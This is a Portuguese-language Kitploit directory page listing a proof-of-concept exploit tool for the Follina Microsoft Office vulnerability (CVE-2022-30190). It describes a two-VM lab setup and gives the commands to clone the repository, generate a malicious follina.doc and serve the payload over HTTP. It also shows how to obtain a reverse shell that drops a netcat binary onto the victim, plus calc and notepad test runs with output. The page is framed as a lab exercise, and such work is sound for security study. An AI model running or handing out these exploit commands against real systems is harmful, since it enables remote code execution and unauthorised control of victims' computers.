Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-30190 — Follina (CVE-2022-30190) é uma vulnerabilidade de dia zero do Microsoft Office que foi recentemente descoberta. É uma vulnerabilidade de alta gravidade que os hackers podem aproveitar para ataques de execução remota de código (RCE). | Kitploit
Ferramentas/GitHubGitHub/aminetitrofine/cve-2022-30190
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubaminetitrofine/cve-2022-30190

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

CVE-2022-30190

Follina (CVE-2022-30190) é uma vulnerabilidade de dia zero do Microsoft Office que foi recentemente descoberta. É uma vulnerabilidade de alta gravidade que os hackers podem aproveitar para ataques de execução remota de código (RCE).

Ver Repositório
1261há 3 anosAinda não revisado
Compartilhar

CVE 30190

Amine TITROFINE | 17 de dezembro de 2022


Follina (CVE-2022-30190) é uma vulnerabilidade de dia zero do Microsoft Office que foi recentemente descoberta. É uma vulnerabilidade de alta gravidade que os hackers podem usar para ataques de execução remota de código (RCE). Ela existe quando o MSDT é chamado usando o protocolo URL a partir de um aplicativo chamador, como o Word. Um atacante que explore com sucesso esta vulnerabilidade pode executar código arbitrário com os privilégios do aplicativo chamador. O atacante pode então instalar programas, visualizar, alterar ou excluir dados, ou criar novas contas no contexto permitido pelos direitos do usuário.

Ambiente

2 VMs :

  • Máquina Atacante
    • kali-linux-2022.3-virtualbox-amd64 ( Link para Download )
  • Máquina Vítima
    • Windows 10 (64 bits) ( Link para Download )
    • Microsoft Office 2016 Pro ( Link para Download )

Exploit

root@kitploit:~
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git

$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri

$ python3 follina.py –r 9999

Após executar o programa follina.py, um arquivo ( follina.doc ) aparecerá, contendo um script malicioso .

Para facilitar o compartilhamento de arquivos entre as duas VMs, usaremos o servidor HTTP Python

root@kitploit:~
$ python3 –m http.server 8080

Exemplos

Obtenha uma reverse shell na porta 9999. Nota: isso baixa um binário netcat para a vítima e o coloca em C:\Windows\Tasks. Ele não limpa o binário. Isso acionará detecções de antivírus, a menos que o Antivírus esteja desabilitado.

root@kitploit:~
$ python3 follina.py -r 9999

Execute calc.exe:

root@kitploit:~
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

Execute notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"
Baixar ferramenta